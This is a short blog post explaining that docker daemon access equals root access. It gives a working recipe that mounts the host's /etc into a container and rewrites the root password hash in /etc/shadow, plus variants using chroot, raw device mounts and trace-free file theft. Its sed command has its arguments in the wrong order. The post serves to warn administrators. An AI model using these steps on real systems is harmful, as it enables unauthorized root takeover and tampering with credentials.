2016-09-20 - root via docker

there are a lot of discussions regarding docker and its security features. there are two main aspects here:

1. can application, started as a non-root, inside a container, escape from it?
2. can we gain root access by having an access to docker?

in this post i'd like to quickly answer 2nd question. just try this one out:

docker run -it --rm -v /etc/:/mnt debian:stable
sed -i /mnt/shadow 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::'
exit
su # type in your new password

and voila – you're root now.

how does it work? it's simple – we're mapping content of /etc/ from root filesystem (docker's daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit shadow file, to set our own password.

is it the only way to go? definitely NO! some more examples follow:

• map the whole / to /mnt and do chroot into there – root there is!
• export device with a filesystem to a container (eg. –device=/dev/sda) and mount/hex-edit it there – and root there is!
• map any directory you want to /mnt and just steal/change what you need w/o leaving additional traces.

…and probably many more, alike. i think you get the point.

long story short – giving any user access to docker daemon means effectively giving her a root access.